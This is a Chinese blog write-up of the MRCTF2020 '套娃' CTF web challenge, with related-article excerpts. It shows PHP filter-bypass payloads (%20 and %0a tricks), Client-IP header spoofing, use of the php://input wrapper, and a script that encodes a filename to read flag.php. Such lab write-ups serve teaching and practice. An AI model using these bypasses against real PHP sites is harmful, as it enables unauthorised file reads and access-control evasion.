[MRCTF2020]套娃

最新推荐文章于 2024-08-11 10:28:40 发布
最新推荐文章于 2024-08-11 10:28:40 发布
阅读量385 收藏
点赞数 1
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/118330945
版权

查看源码有注释代码如下:

$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}

这里主要考察字符绕过,我们可以利用php的字符串解析特性来绕过这些判断。

学习链接:https://www.freebuf.com/articles/web/213359.html

那在这里就可以使用%20代替下划线绕过第一个判断。第二个判断中正则匹配表示匹配字符串的开头和结尾,在字符串中换行可以表示字符串的结尾,所以可以用%0a(换行符的url编码)绕过。

因此payload为:

/?b%20u%20p%20t=23333%0a

这里提示flag在secrettw.php打开看看。

查看源码有一串jsfuck编码,

解码得到 或者也可以放在控制台直接运行。

post me Merak

使用post随便给Merak传点参数,得到下一部分源码。

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

进行源码审计,

1、需要ip为127.0.0.1可以添加一个client-ip:127.0.0.1 来完成绕过。

2、file_get_contents可以用php伪协议绕过,

2333=php://input
post:todat is a happy day

3、change函数的作用传入参数先进性base64编码,然后将字符转化为ASCII并且+$i*2

反写change函数,代码如下:

<?php
function unchange($v){ 
    $re = '';
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return $re; 
}
$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
//ZmpdYSZmXGI=

?>

Ushernrt
关注
专栏目录
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 526
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
【BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 3089
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
Buuctf zips压缩包套娃解密
最新发布
weixin_34979095的博客
08-11 440
拖到RAR破解软件,找到723456密码,解压得到111.zip,拖到winhex打开看看是不是伪加密。掩码攻击,设置掩码:1558?,密码为:1558080832.15。用记事本打开setup.sh,发现密码是时间戳。保存修改结果退出,解压得到flag.zip。
buuctf 套娃 解析
qq_73722777的博客
04-07 593
其中query的目的是获得所有上传的数据,第一个if过滤了“_”和%5f(也就是url编码的“_”),第二个if使得变量b_u_p_t要不等于23333并且后面的preg函数要使变量b_u_p_t等于23333。于是payload的思路为:通过满足ip和变量2333的需求,从而在file_get_content()函数中打开flag.php,得到flag。实现的是将字符串v进行base64编码后,对每一个字符进行【ascii编码+i*2】的处理,最终结果输出到字符串re中。再进行base64加密,得到。
[MRCTF2020]套娃 php字符串解析绕过,jsfuck编码
weixin_73399382的博客
08-07 676
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' )老办法伪造ip,然后利用data伪协议写入数据传给2333即可。b%20u%20p%20t=23333%0A //%20为空格url编码,%0A为回车url编码。乘以2的结果,再将得到的新的ASCII码转换回字符,并将其拼接到一个结果字符串。b%2eu%2ep%2et=23333%0A //%2e为.第二种去这个网站解析。
攻防世界Encode
淡巴枯的博客
11-20 1880
题目描述:套娃?题目环境:解密得到:4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35解密得到:
BUUCTF [MRCTF2020]套娃
qq_43774856的博客
11-30 243
BUUCTF [MRCTF2020]套娃 打开链接,查看源码,如图所示 关于$_SERVER[‘QUERY_STRING’]取值, 例如: http://localhost/aaa/?p=222 $_SERVER[‘QUERY_STRING’] = “p=222”; substr_count()函数计算子串在字符串中出现的次数 PS:子串区分大小写 上述代码不能出现’_’和’%5f’,可以用‘ ’或‘.’或‘ %5F’绕过 通过get取得的参数b_u_p_t不等于23333但是正则,匹配需要匹配到2333
[MRCTF2020]千层套路
zip471642048的博客
06-23 805
题目地址 : https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF 最后解出来了一个qr.zip 使用脚本拼图
CTF——MISC习题讲解(MRCTF2020系列)
tlovejr的博客
03-08 4265
CTF——MISC习题讲解(MRCTF2020系列) 前言 上一章节我们已经做完一场比赛的杂项题目,这次给大家介绍一下MRCTF中杂项题目 一、[MRCTF2020]pyFlag 题目链接如下: 链接:https://pan.baidu.com/s/1IQWks6UXUFq5gbkpcGp9sw?pwd=t05h 提取码:t05h 首先打开题目后发现共有三张图片 老规矩,对于杂项的题目先扔到winhex或者010Editor工具进行查看 但是发现这几张图片的结尾处都是存在压缩包数据 第一张图片 第二张图
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4264
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
【攻防世界-misc】Encode
weixin_73625393的博客
11-28 943
得到解码结果后,看到是由数字和字母组成,再根据题目描述为套娃,猜测为base编码(有好多种),开始解密。得到flag值:flag{W0w_y0u_c4n_rea11y_enc0d1ng!将得到的值进行解密,这里需要用到base85,但网站中的base85解不了,先用base16解码,得到一个结果。在将结果复制换成base32解密,在将结果复制换成base64解密,方法一:用脚本运行,
ctf (套娃)
Glacier_Mount的博客
07-21 5440
键盘流量
[MRCTF2020]套娃 字符串解析特性bypass及ascii移位
qq_54929891的博客
03-22 567
<!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo...
【BUUCTF】[SWPU2019]神奇的二维码
yoyoko_chan的博客
07-22 1978
0x00  刚拿到这题的时候,还以为很简单的样子,结果发现才是一坑接一坑,套娃套娃。(出题人友好点儿吧,球球了>_<) 0x01  惯例下好文件,是个rar,打开发现是个“神奇的二维码”,直接扫描无果,拿到winhex下查看,发现好几个rar文件  分别手动复制粘贴到新文件,保存,共有四个rar,按照在文件里的位置先后顺序排列  1.rar打开是一行base64编码的字符串,解码后为  打开2.rar,里面还有一个需要密码的rar,用上面解码后的字符串尝试解密,成功后发现是个和2.rar
substr_count
m0_37477061的博客
03-09 300
http://www.php.net/manual/zh/function.substr-count.php
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值